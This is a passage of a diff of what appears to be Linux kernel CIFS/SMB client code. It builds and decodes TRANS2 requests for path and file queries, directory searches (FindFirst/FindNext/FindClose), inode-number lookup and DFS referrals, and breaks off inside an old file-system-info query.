++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	if (legacy)
++		pSMB->InformationLevel = cpu_to_le16(SMB_INFO_STANDARD);
++	else
++		pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_ALL_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QPathInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc) /* BB add auto retry on EOPNOTSUPP? */
++			rc = -EIO;
++		else if (!legacy && get_bcc(&pSMBr->hdr) < 40)
++			rc = -EIO;	/* bad smb */
++		else if (legacy && get_bcc(&pSMBr->hdr) < 24)
++			rc = -EIO;  /* 24 or 26 expected but we do not read
++					last field */
++		else if (data) {
++			int size;
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++
++			/*
++			 * On legacy responses we do not read the last field,
++			 * EAsize, which is fortunate since it varies by
++			 * subdialect and also differs between Set and Get
++			 * (i.e. two bytes or four), but we don't care here.
++			 */
++			if (legacy)
++				size = sizeof(FILE_INFO_STANDARD);
++			else
++				size = sizeof(FILE_ALL_INFO);
++			memcpy((char *) data, (char *) &pSMBr->hdr.Protocol +
++			       data_offset, size);
++		} else
++			rc = -ENOMEM;
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto QPathInfoRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBUnixQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		 u16 netfid, FILE_UNIX_BASIC_INFO *pFindData)
++{
++	struct smb_t2_qfi_req *pSMB = NULL;
++	struct smb_t2_qfi_rsp *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	__u16 params, byte_count;
++
++UnixQFileInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2 /* level */ + 2 /* fid */;
++	pSMB->t2.TotalDataCount = 0;
++	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->t2.MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
++	pSMB->t2.MaxSetupCount = 0;
++	pSMB->t2.Reserved = 0;
++	pSMB->t2.Flags = 0;
++	pSMB->t2.Timeout = 0;
++	pSMB->t2.Reserved2 = 0;
++	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
++					       Fid) - 4);
++	pSMB->t2.DataCount = 0;
++	pSMB->t2.DataOffset = 0;
++	pSMB->t2.SetupCount = 1;
++	pSMB->t2.Reserved3 = 0;
++	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
++	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
++	pSMB->Pad = 0;
++	pSMB->Fid = netfid;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in UnixQFileInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < sizeof(FILE_UNIX_BASIC_INFO)) {
++			cifs_dbg(VFS, "Malformed FILE_UNIX_BASIC_INFO response. Unix Extensions can be disabled on mount by specifying the nosfu mount option.\n");
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			memcpy((char *) pFindData,
++			       (char *) &pSMBr->hdr.Protocol +
++			       data_offset,
++			       sizeof(FILE_UNIX_BASIC_INFO));
++		}
++	}
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto UnixQFileInfoRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBUnixQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		     const unsigned char *searchName,
++		     FILE_UNIX_BASIC_INFO *pFindData,
++		     const struct nls_table *nls_codepage, int remap)
++{
++/* SMB_QUERY_FILE_UNIX_BASIC */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned = 0;
++	int name_len;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QPathInfo (Unix) the path %s\n", searchName);
++UnixQPathInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, searchName);
++	}
++
++	params = 2 /* level */ + 4 /* reserved */ + name_len /* includes NUL */;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in UnixQPathInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < sizeof(FILE_UNIX_BASIC_INFO)) {
++			cifs_dbg(VFS, "Malformed FILE_UNIX_BASIC_INFO response. Unix Extensions can be disabled on mount by specifying the nosfu mount option.\n");
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			memcpy((char *) pFindData,
++			       (char *) &pSMBr->hdr.Protocol +
++			       data_offset,
++			       sizeof(FILE_UNIX_BASIC_INFO));
++		}
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto UnixQPathInfoRetry;
++
++	return rc;
++}
++
++/* xid, tcon, searchName and codepage are input parms, rest are returned */
++int
++CIFSFindFirst(const unsigned int xid, struct cifs_tcon *tcon,
++	      const char *searchName, struct cifs_sb_info *cifs_sb,
++	      __u16 *pnetfid, __u16 search_flags,
++	      struct cifs_search_info *psrch_inf, bool msearch)
++{
++/* level 257 SMB_ */
++	TRANSACTION2_FFIRST_REQ *pSMB = NULL;
++	TRANSACTION2_FFIRST_RSP *pSMBr = NULL;
++	T2_FFIRST_RSP_PARMS *parms;
++	int rc = 0;
++	int bytes_returned = 0;
++	int name_len, remap;
++	__u16 params, byte_count;
++	struct nls_table *nls_codepage;
++
++	cifs_dbg(FYI, "In FindFirst for %s\n", searchName);
++
++findFirstRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	nls_codepage = cifs_sb->local_nls;
++	remap = cifs_remap(cifs_sb);
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
++				       PATH_MAX, nls_codepage, remap);
++		/* We cannot add the asterisk earlier in case
++		it got remapped to 0xF03A as if it were part of the
++		directory name instead of a wildcard */
++		name_len *= 2;
++		if (msearch) {
++			pSMB->FileName[name_len] = CIFS_DIR_SEP(cifs_sb);
++			pSMB->FileName[name_len+1] = 0;
++			pSMB->FileName[name_len+2] = '*';
++			pSMB->FileName[name_len+3] = 0;
++			name_len += 4; /* now the trailing null */
++			/* null terminate just in case */
++			pSMB->FileName[name_len] = 0;
++			pSMB->FileName[name_len+1] = 0;
++			name_len += 2;
++		}
++	} else {
++		name_len = copy_path_name(pSMB->FileName, searchName);
++		if (msearch) {
++			if (WARN_ON_ONCE(name_len > PATH_MAX-2))
++				name_len = PATH_MAX-2;
++			/* overwrite nul byte */
++			pSMB->FileName[name_len-1] = CIFS_DIR_SEP(cifs_sb);
++			pSMB->FileName[name_len] = '*';
++			pSMB->FileName[name_len+1] = 0;
++			name_len += 2;
++		}
++	}
++
++	params = 12 + name_len /* includes null */ ;
++	pSMB->TotalDataCount = 0;	/* no EAs */
++	pSMB->MaxParameterCount = cpu_to_le16(10);
++	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize & 0xFFFFFF00);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(
++	      offsetof(struct smb_com_transaction2_ffirst_req, SearchAttributes)
++		- 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;	/* one byte, no need to make endian neutral */
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_FIND_FIRST);
++	pSMB->SearchAttributes =
++	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
++			ATTR_DIRECTORY);
++	pSMB->SearchCount = cpu_to_le16(CIFSMaxBufSize/sizeof(FILE_UNIX_INFO));
++	pSMB->SearchFlags = cpu_to_le16(search_flags);
++	pSMB->InformationLevel = cpu_to_le16(psrch_inf->info_level);
++
++	/* BB what should we set StorageType to? Does it matter? BB */
++	pSMB->SearchStorageType = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_ffirst);
++
++	if (rc) {/* BB add logic to retry regular search if Unix search
++			rejected unexpectedly by server */
++		/* BB Add code to handle unsupported level rc */
++		cifs_dbg(FYI, "Error in FindFirst = %d\n", rc);
++
++		cifs_buf_release(pSMB);
++
++		/* BB eventually could optimize out free and realloc of buf */
++		/*    for this case */
++		if (rc == -EAGAIN)
++			goto findFirstRetry;
++	} else { /* decode response */
++		/* BB remember to free buffer if error BB */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		if (rc == 0) {
++			unsigned int lnoff;
++
++			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
++				psrch_inf->unicode = true;
++			else
++				psrch_inf->unicode = false;
++
++			psrch_inf->ntwrk_buf_start = (char *)pSMBr;
++			psrch_inf->smallBuf = false;
++			psrch_inf->srch_entries_start =
++				(char *) &pSMBr->hdr.Protocol +
++					le16_to_cpu(pSMBr->t2.DataOffset);
++			parms = (T2_FFIRST_RSP_PARMS *)((char *) &pSMBr->hdr.Protocol +
++			       le16_to_cpu(pSMBr->t2.ParameterOffset));
++
++			if (parms->EndofSearch)
++				psrch_inf->endOfSearch = true;
++			else
++				psrch_inf->endOfSearch = false;
++
++			psrch_inf->entries_in_buffer =
++					le16_to_cpu(parms->SearchCount);
++			psrch_inf->index_of_last_entry = 2 /* skip . and .. */ +
++				psrch_inf->entries_in_buffer;
++			lnoff = le16_to_cpu(parms->LastNameOffset);
++			if (CIFSMaxBufSize < lnoff) {
++				cifs_dbg(VFS, "ignoring corrupt resume name\n");
++				psrch_inf->last_entry = NULL;
++				return rc;
++			}
++
++			psrch_inf->last_entry = psrch_inf->srch_entries_start +
++							lnoff;
++
++			if (pnetfid)
++				*pnetfid = parms->SearchHandle;
++		} else {
++			cifs_buf_release(pSMB);
++		}
++	}
++
++	return rc;
++}
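++
++/*
++ * Name buffer layout in the msearch case above, for an assumed ASCII
++ * path "dir" (so copy_path_name() returns name_len = 4 including the
++ * NUL): the NUL at FileName[3] is overwritten with the directory
++ * separator, then '*' and a new NUL follow, giving "dir\*" (or
++ * "dir/*") and name_len = 6.  In the Unicode branch the separator,
++ * '*' and NUL are appended as little-endian 16-bit units only after
++ * conversion, since converting '*' itself could remap it to 0xF03A.
++ */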
++
++int CIFSFindNext(const unsigned int xid, struct cifs_tcon *tcon,
++		 __u16 searchHandle, __u16 search_flags,
++		 struct cifs_search_info *psrch_inf)
++{
++	TRANSACTION2_FNEXT_REQ *pSMB = NULL;
++	TRANSACTION2_FNEXT_RSP *pSMBr = NULL;
++	T2_FNEXT_RSP_PARMS *parms;
++	char *response_data;
++	int rc = 0;
++	int bytes_returned;
++	unsigned int name_len;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In FindNext\n");
++
++	if (psrch_inf->endOfSearch)
++		return -ENOENT;
++
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 14; /* includes 2 bytes of null string, converted to LE below */
++	byte_count = 0;
++	pSMB->TotalDataCount = 0;       /* no EAs */
++	pSMB->MaxParameterCount = cpu_to_le16(8);
++	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize & 0xFFFFFF00);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(
++	      offsetof(struct smb_com_transaction2_fnext_req, SearchHandle) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_FIND_NEXT);
++	pSMB->SearchHandle = searchHandle;      /* always kept as le */
++	pSMB->SearchCount =
++		cpu_to_le16(CIFSMaxBufSize / sizeof(FILE_UNIX_INFO));
++	pSMB->InformationLevel = cpu_to_le16(psrch_inf->info_level);
++	pSMB->ResumeKey = psrch_inf->resume_key;
++	pSMB->SearchFlags = cpu_to_le16(search_flags);
++
++	name_len = psrch_inf->resume_name_len;
++	params += name_len;
++	if (name_len < PATH_MAX) {
++		memcpy(pSMB->ResumeFileName, psrch_inf->presume_name, name_len);
++		byte_count += name_len;
++		/* 14 byte parm len above enough for 2 byte null terminator */
++		pSMB->ResumeFileName[name_len] = 0;
++		pSMB->ResumeFileName[name_len+1] = 0;
++	} else {
++		rc = -EINVAL;
++		goto FNext2_err_exit;
++	}
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_fnext);
++	if (rc) {
++		if (rc == -EBADF) {
++			psrch_inf->endOfSearch = true;
++			cifs_buf_release(pSMB);
++			rc = 0; /* search probably was closed at end of search*/
++		} else
++			cifs_dbg(FYI, "FindNext returned = %d\n", rc);
++	} else {                /* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc == 0) {
++			unsigned int lnoff;
++
++			/* BB fixme add lock for file (srch_info) struct here */
++			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
++				psrch_inf->unicode = true;
++			else
++				psrch_inf->unicode = false;
++			response_data = (char *) &pSMBr->hdr.Protocol +
++			       le16_to_cpu(pSMBr->t2.ParameterOffset);
++			parms = (T2_FNEXT_RSP_PARMS *)response_data;
++			response_data = (char *)&pSMBr->hdr.Protocol +
++				le16_to_cpu(pSMBr->t2.DataOffset);
++			if (psrch_inf->smallBuf)
++				cifs_small_buf_release(
++					psrch_inf->ntwrk_buf_start);
++			else
++				cifs_buf_release(psrch_inf->ntwrk_buf_start);
++			psrch_inf->srch_entries_start = response_data;
++			psrch_inf->ntwrk_buf_start = (char *)pSMB;
++			psrch_inf->smallBuf = false;
++			if (parms->EndofSearch)
++				psrch_inf->endOfSearch = true;
++			else
++				psrch_inf->endOfSearch = false;
++			psrch_inf->entries_in_buffer =
++						le16_to_cpu(parms->SearchCount);
++			psrch_inf->index_of_last_entry +=
++				psrch_inf->entries_in_buffer;
++			lnoff = le16_to_cpu(parms->LastNameOffset);
++			if (CIFSMaxBufSize < lnoff) {
++				cifs_dbg(VFS, "ignoring corrupt resume name\n");
++				psrch_inf->last_entry = NULL;
++				return rc;
++			} else
++				psrch_inf->last_entry =
++					psrch_inf->srch_entries_start + lnoff;
++
++/*  cifs_dbg(FYI, "fnxt2 entries in buf %d index_of_last %d\n",
++    psrch_inf->entries_in_buffer, psrch_inf->index_of_last_entry); */
++
++			/* BB fixme add unlock here */
++		}
++
++	}
++
++	/* BB On error, should we leave previous search buf (and count and
++	last entry fields) intact or free the previous one? */
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++	since file handle passed in no longer valid */
++FNext2_err_exit:
++	if (rc != 0)
++		cifs_buf_release(pSMB);
++	return rc;
++}
++
++int
++CIFSFindClose(const unsigned int xid, struct cifs_tcon *tcon,
++	      const __u16 searchHandle)
++{
++	int rc = 0;
++	FINDCLOSE_REQ *pSMB = NULL;
++
++	cifs_dbg(FYI, "In CIFSSMBFindClose\n");
++	rc = small_smb_init(SMB_COM_FIND_CLOSE2, 1, tcon, (void **)&pSMB);
++
++	/* no sense returning error if session restarted
++		as file handle has been closed */
++	if (rc == -EAGAIN)
++		return 0;
++	if (rc)
++		return rc;
++
++	pSMB->FileID = searchHandle;
++	pSMB->ByteCount = 0;
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(VFS, "Send error in FindClose = %d\n", rc);
++
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_fclose);
++
++	/* Since session is dead, search handle closed on server already */
++	if (rc == -EAGAIN)
++		rc = 0;
++
++	return rc;
++}
++
++int
++CIFSGetSrvInodeNumber(const unsigned int xid, struct cifs_tcon *tcon,
++		      const char *search_name, __u64 *inode_number,
++		      const struct nls_table *nls_codepage, int remap)
++{
++	int rc = 0;
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int name_len, bytes_returned;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In GetSrvInodeNum for %s\n", search_name);
++	if (tcon == NULL)
++		return -ENODEV;
++
++GetInodeNumberRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName,
++					   search_name, PATH_MAX, nls_codepage,
++					   remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, search_name);
++	}
++
++	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++		struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_INTERNAL_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "error %d in QueryInternalInfo\n", rc);
++	} else {
++		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		/* BB also check enough total bytes returned */
++		if (rc || get_bcc(&pSMBr->hdr) < 2)
++			/* If rc, should we check for EOPNOTSUPP and
++			disable the srvino flag? Or in the caller? */
++			rc = -EIO;      /* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
++			struct file_internal_info *pfinfo;
++			/* BB Do we need a cast or hash here? */
++			if (count < 8) {
++				cifs_dbg(FYI, "Invalid size ret in QryIntrnlInf\n");
++				rc = -EIO;
++				goto GetInodeNumOut;
++			}
++			pfinfo = (struct file_internal_info *)
++				(data_offset + (char *) &pSMBr->hdr.Protocol);
++			*inode_number = le64_to_cpu(pfinfo->UniqueId);
++		}
++	}
++GetInodeNumOut:
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto GetInodeNumberRetry;
++	return rc;
++}
++
++int
++CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
++		const char *search_name, struct dfs_info3_param **target_nodes,
++		unsigned int *num_of_nodes,
++		const struct nls_table *nls_codepage, int remap)
++{
++/* TRANS2_GET_DFS_REFERRAL */
++	TRANSACTION2_GET_DFS_REFER_REQ *pSMB = NULL;
++	TRANSACTION2_GET_DFS_REFER_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	__u16 params, byte_count;
++	*num_of_nodes = 0;
++	*target_nodes = NULL;
++
++	cifs_dbg(FYI, "In GetDFSRefer the path %s\n", search_name);
++	if (ses == NULL || ses->tcon_ipc == NULL)
++		return -ENODEV;
++
++getDFSRetry:
++	/*
++	 * Use smb_init_no_reconnect() instead of smb_init() as
++	 * CIFSGetDFSRefer() may be called from cifs_reconnect_tcon() and thus
++	 * causing an infinite recursion.
++	 */
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc,
++				   (void **)&pSMB, (void **)&pSMBr);
++	if (rc)
++		return rc;
++
++	/* server pointer checked in called function,
++	but should never be null here anyway */
++	pSMB->hdr.Mid = get_next_mid(ses->server);
++	pSMB->hdr.Tid = ses->tcon_ipc->tid;
++	pSMB->hdr.Uid = ses->Suid;
++	if (ses->capabilities & CAP_STATUS32)
++		pSMB->hdr.Flags2 |= SMBFLG2_ERR_STATUS;
++	if (ses->capabilities & CAP_DFS)
++		pSMB->hdr.Flags2 |= SMBFLG2_DFS;
++
++	if (ses->capabilities & CAP_UNICODE) {
++		pSMB->hdr.Flags2 |= SMBFLG2_UNICODE;
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->RequestFileName,
++				       search_name, PATH_MAX, nls_codepage,
++				       remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {	/* BB improve the check for buffer overruns BB */
++		name_len = copy_path_name(pSMB->RequestFileName, search_name);
++	}
++
++	if (ses->server->sign)
++		pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	pSMB->hdr.Uid = ses->Suid;
++
++	params = 2 /* level */  + name_len /*includes null */ ;
++	pSMB->TotalDataCount = 0;
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->MaxParameterCount = 0;
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	  struct smb_com_transaction2_get_dfs_refer_req, MaxReferralLevel) - 4);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_GET_DFS_REFERRAL);
++	byte_count = params + 3 /* pad */ ;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->MaxReferralLevel = cpu_to_le16(3);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in GetDFSRefer = %d\n", rc);
++		goto GetDFSRefExit;
++	}
++	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++	/* BB Also check if enough total bytes returned? */
++	if (rc || get_bcc(&pSMBr->hdr) < 17) {
++		rc = -EIO;      /* bad smb */
++		goto GetDFSRefExit;
++	}
++
++	cifs_dbg(FYI, "Decoding GetDFSRefer response BCC: %d  Offset %d\n",
++		 get_bcc(&pSMBr->hdr), le16_to_cpu(pSMBr->t2.DataOffset));
++
++	/* parse returned result into more usable form */
++	rc = parse_dfs_referrals(&pSMBr->dfs_data,
++				 le16_to_cpu(pSMBr->t2.DataCount),
++				 num_of_nodes, target_nodes, nls_codepage,
++				 remap, search_name,
++				 (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE) != 0);
++
++GetDFSRefExit:
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto getDFSRetry;
++
++	return rc;
++}
++
++/* Query File System Info such as free space to old servers such as Win 9x */
++int
++SMBOldQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
++	      struct kstatfs *FSData)
++{
++/* level 0x01 SMB_QUERY_FILE_SYSTEM_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_ALLOC_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "OldQFSInfo\n");
++oldQFSInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;     /* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
